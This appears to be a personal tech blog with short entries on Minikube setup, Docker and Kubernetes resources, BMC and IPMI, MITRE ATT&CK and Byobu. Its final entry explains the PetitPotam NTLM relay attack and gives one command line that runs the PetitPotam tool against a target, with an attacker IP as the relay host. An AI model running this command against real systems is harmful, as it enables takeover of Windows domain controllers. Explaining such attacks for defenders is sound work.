This is a great presentation that talks about:
AD security reviews:
Links:
Here're the steps that I follow in setting up my Minikube in Ubuntu.
$ sudo apt update && apt upgrade -y
$ sudo apt install virtualbox virtualbox-ext-pack
$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
$ chmod +x ./kubectl
$ sudo mv ./kubectl /usr/local/bin/kubectl
$ kubectl version --output=yaml
$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 && chmod +x minikube && sudo mv minikube /usr/local/bin/
$ minikube version -o json
$ minikube start --vm-driver=docker
$ kubectl get pods
$ kubectl get nodes
$ kubectl config view
$ kubectl cluster-info
$ minikube ssh
$ minikube status
$ minikube dashboard
$ minikube dashboard --url
Links:
Here're a few links for beginner to learn about Docker and Kubernetes. Things like docker, containers, kubernetes, images, registries, pods, replica sets, services deployment, and microservices.
Links:
Recently, I just learned something about BMC and the IPMI protocol.
Baseboard Management Controllers (BMCs) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI.
BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system's motherboard. Network access is obtained either via 'sideband' access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards.
Management Interface (IPMI) is a collection of specifications that define communication protocols for talking both across a local bus as well as the network. This specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0.
There is a research, by Dan Farmer, on the security of the IPMI network protocol that uses UDP port 623.
Links:
MITRE ATT&CK™ offers the security community a common language to communicate about adversary tactics, techniques, and behaviors. In the articles and resources below, we offer guidance on how security teams can use the framework to expand detection coverage and increase visibility.
Links:
After GNU screen and TMUX, I'm learning how to use Byobu which is a terminal multiplexer and easy to use, Byobu is used to have multiple windows, consoles and split panes within the windows and will also show the status badges and notifications on the terminal.
Unfortunately, it doesn't work well with Putty. Some shortcuts are not working even with some tweaking.
Links:
Within a month, after PrintNightmare and HiveNightmare, here come the PetitPotam for Windows administrators.
This is a new exploit that modifies from PrintNightmare, and take advantage of NTLM relay, to exploit a function in Microsoft Encrypting File System Remote Protocol (MS-EFSRPC API) over a network.
The MS-EFSRPC API is enabled by default on all Windows machines, and disabling the MS-EFS service will not prevent this attack from being successful.
A malicious actor could exploit this feature to gain full control of a Microsoft Windows Domain Controller and the entire Windows Domain.
 |
| Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP |
Links: